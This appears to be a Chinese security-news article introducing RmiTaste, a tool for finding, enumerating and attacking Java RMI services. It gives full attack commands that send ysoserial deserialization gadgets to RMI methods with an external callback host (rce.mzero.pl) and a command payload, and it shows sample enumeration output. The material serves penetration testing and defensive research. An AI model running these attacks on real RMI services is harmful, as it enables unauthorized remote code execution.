1. 极安网首页
  2. 网络安全工具

RmiTaste:针对RMI服务的检测/枚举/交互/攻击工具

RmiTaste:针对RMI服务的检测/枚举/交互/攻击工具-极安网

RmiTaste

RmiTaste可以帮助广大安全研究专家通过调用ysoserial实用工具所提供的远程方法来检测、枚举、交互和攻击RMI服务。除此之外,它还允许我们使用特定的参数来调用远程方法。

RmiTaste的主要目的是为了帮助安全专家识别目标系统中不安全的RMI服务,针对目标计算机系统未经授权的访问是一种违法行为,RmiTaste的使用必须要在合法场景下进行。

工具构建和运行

注意,本工具的运行需要OpenJDK v11.0.3。

首先,我们需要下载ysoserial-master-SNAPSHOT.jar,然后将其存储在libs_attack目录中,下载地址如下:

https://github.com/frohoff/ysoserial

第二步,使用maven构建项目代码:

mvn package

接下来,运行下列命令:

java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste -h

 __________        ._____________                __

 \______   \ _____ |__\__    ___/____    _______/  |_  ____

 |       _//     \|  | |    |  \__  \  /  ___/\   __\/ __ \

 |    |   \  Y Y  \  | |    |   / __ \_\___ \  |  | \  ___/

 |____|_  /__|_|  /__| |____|  (____  /____  > |__|  \___  >

       \/      \/                  \/     \/            \/

 @author Marcin Ogorzelski (mzero - @_mzer0) STM Solutions

 

Warning: RmiTaste was written to aid security professionals in identifying the

         insecure use of RMI services on systems which the user has prior

         permission to attack. RmiTaste must be used in accordance with all

         relevant laws. Failure to do so could lead to your prosecution.

         The developers assume no liability and are not responsible for any

         misuse or damage caused by this program.

工具使用

RmiTaste提供了四种运行模式,分别为连接、枚举、攻击和调用。每一种模式都提供了单独的帮助菜单:

java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste -h

(...)

Usage: <main class> [-h] [COMMAND]

  -h, --help   显示这条帮助信息

Commands:

  conn   检测与主机的连接

  enum   枚举RMI服务

  attack  攻击RMI注册方法

  call    调用RMI远程对象的特定方法

conn连接模式

conn连接模式允许我们判断目标端口是否为RMI服务端口:

# Check if 127.0.0.1:1099 is RMI Service

java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste conn -t 127.0.0.1 -p 1099

enum枚举模式

enum枚举模式允许研究人员获取RMI服务的相关信息,比如说远程对象名以及远程对象实现和继承的类名。如果远程对象所实现的接口在RmiTaste类路径中可访问,那么RmiTaste将会打印出所有的远程方法,并支持我们直接调用:

# RMI service enumeration

java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste enum -t 127.0.0.1 -p 1099

attack攻击模式

attack攻击模式允许使用ysoserial特定的实用工具链来调用远程方法。假设远程对象拥有下列方法:

acc1 [object] [127.0.1.1:38293]

         implements java.rmi.Remote [interface]

         extends java.lang.reflect.Proxy [class]

         implements m0.rmitaste.example.server.ClientAccount [interface]

                setPin(java.lang.String param0); [method]

                        Parameters: param0;  may be vulnerable to Java Deserialization! [info]

                getBalance(); [method]

                deposit(java.lang.Object param0); [method]

                        Parameters: param0;  may be vulnerable to Java Deserialization! [info]

                withdraw(float param0); [method]
# Call all remote methods with URLDNS gadget as parameter

java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste attack -t 127.0.0.1 -p 1099 -g "URLDNS" -c "http://rce.mzero.pl"
# Call acc1:m0.rmitaste.example.server.ClientAccount:deposit method with URLDNS gadget as parameter

java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste attack -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:deposit" -g "URLDNS" -c "http://rce.mzero.pl"

"-gen bruteforce"选项还允许我们实现对远程方法的暴力破解:

# Call acc1:m0.rmitaste.example.server.ClientAccount:deposit method with gadgets from ysoserial and command ping 127.0.0.1

java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste attack -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:deposit" -gen bruteforce -c "ping 127.0.0.1"

call调用模式

call调用模式允许我们调用RMI远程对象的特定方法,假设远程对象拥有下列方法:

acc1 [object] [127.0.1.1:38293]

         implements java.rmi.Remote [interface]

         extends java.lang.reflect.Proxy [class]

         implements m0.rmitaste.example.server.ClientAccount [interface]

                setPin(java.lang.String param0); [method]

                        Parameters: param0;  may be vulnerable to Java Deserialization! [info]

                getBalance(); [method]

                deposit(java.lang.Object param0); [method]

                        Parameters: param0;  may be vulnerable to Java Deserialization! [info]

                withdraw(float param0); [method]
# Call m0.rmitaste.example.server.ClientAccount.getBalance method on acc1 remote object

java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste call -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:getBalance"
# Call m0.rmitaste.example.server.ClientAccount.setPin("1234") method on acc1 remote object

java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste call -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:setPin" -mp "string=1234

工具使用样例

点击【这里】获取样本服务器。

首先,运行样本服务器。

接下来,进行对象枚举:

root@keyisinyourmind:/media/sf_pentest2/Tools/python/Toolset/Others/RmiTasteTool# java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste enum -t 127.0.0.1 -p 1099

acc1 [object] [127.0.1.1:42881]

   extends java.rmi.server.RemoteObjectInvocationHandler [class]

   implements java.rmi.Remote [interface]

   extends java.lang.reflect.Proxy [class]

   extends java.rmi.server.RemoteObject [class]

   implements m0.rmitaste.example.server.ClientAccount [interface]

   No methods found. I don't have remote object interface. Give it to me!

 

acc2 [object] [127.0.1.1:42881]

   extends java.rmi.server.RemoteObjectInvocationHandler [class]

   implements java.rmi.Remote [interface]

   extends java.lang.reflect.Proxy [class]

   extends java.rmi.server.RemoteObject [class]

   implements m0.rmitaste.example.server.ClientAccount [interface]

   No methods found. I don't have remote object interface. Give it to me!

大家可以看到,RmiTaste需要用到远程对象的接口。在渗透测试过程中,我们还需要去寻找这些接口。在这个样例中,我们只需要将rmitaste.examples-1.0-SNAPSHOT-all.jar拷贝到libs_attack目录中节课。枚举对象样例如下:

acc1 [object] [127.0.1.1:42881]

   extends java.rmi.server.RemoteObjectInvocationHandler [class]

   implements java.rmi.Remote [interface]

   extends java.lang.reflect.Proxy [class]

   extends java.rmi.server.RemoteObject [class]

   implements m0.rmitaste.example.server.ClientAccount [interface]

   setPin(java.lang.String param0); [method]

   Parameters: param0;  may be vulnerable to Java Deserialization! [info]

   getBalance(); [method]

   deposit(java.lang.Object param0); [method]

   Parameters: param0;  may be vulnerable to Java Deserialization! [info]

   withdraw(float param0); [method]

 

acc2 [object] [127.0.1.1:42881]

   extends java.rmi.server.RemoteObjectInvocationHandler [class]

   implements java.rmi.Remote [interface]

   extends java.lang.reflect.Proxy [class]

   extends java.rmi.server.RemoteObject [class]

   implements m0.rmitaste.example.server.ClientAccount [interface]

   setPin(java.lang.String param0); [method]

   Parameters: param0;  may be vulnerable to Java Deserialization! [info]

   getBalance(); [method]

   deposit(java.lang.Object param0); [method]

   Parameters: param0;  may be vulnerable to Java Deserialization! [info]

   withdraw(float param0); [method]

项目地址

RmiTaste:【GitHub传送门

原创文章,作者: Admin ,转载请注明出处:https://secvery.com/4820.html